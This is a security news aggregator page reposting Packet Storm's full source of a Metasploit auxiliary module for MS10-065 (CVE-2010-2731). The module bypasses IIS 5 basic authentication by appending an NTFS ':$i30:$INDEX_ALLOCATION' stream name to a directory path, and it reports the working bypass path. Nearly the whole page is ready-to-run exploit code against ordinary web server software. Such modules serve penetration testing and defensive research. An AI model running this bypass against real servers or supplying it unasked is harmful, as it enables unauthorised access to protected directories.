Security
Headlines
HeadlinesLatestCVEs

Headline

MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass

This Metasploit module bypasses basic authentication for Internet Information Services (IIS). By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.

Packet Storm
Open in Source
#microsoft#git#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',        'Description' => %q{          This module bypasses basic authentication for Internet Information Services (IIS).          By appending the NTFS stream name to the directory name in a request, it is          possible to bypass authentication.        },        'References' => [          [ 'CVE', '2010-2731' ],          [ 'OSVDB', '66160' ],          [ 'MSB', 'MS10-065' ],          [ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]        ],        'Author' => [          'Soroush Dalili',          'sinn3r'        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2010-07-02'      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])      ]    )  end  def has_auth    uri = normalize_uri(target_uri.path)    uri << '/' if uri[-1, 1] != '/'    res = send_request_cgi({      'uri' => uri,      'method' => 'GET'    })    vprint_status(res.body) if res    return (res and res.code == 401)  end  def try_auth    uri = normalize_uri(target_uri.path)    uri << '/' if uri[-1, 1] != '/'    uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"    dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'    user = Rex::Text.rand_text_alpha(rand(5..14))    pass = Rex::Text.rand_text_alpha(rand(5..14))    vprint_status("Requesting: #{dir}")    res = send_request_cgi({      'uri' => dir,      'method' => 'GET',      'authorization' => basic_auth(user, pass)    })    vprint_status(res.body) if res    return (res && (res.code != 401) && (res.code != 404)) ? dir : ''  end  def run    if !has_auth      print_error('No basic authentication enabled')      return    end    bypass_string = try_auth    if bypass_string.empty?      print_error('The bypass attempt did not work')    else      print_good("You can bypass auth by doing: #{bypass_string}")    end  endend

Packet Storm: Latest News

Ivanti EPM Remote Code Execution
Packet Storm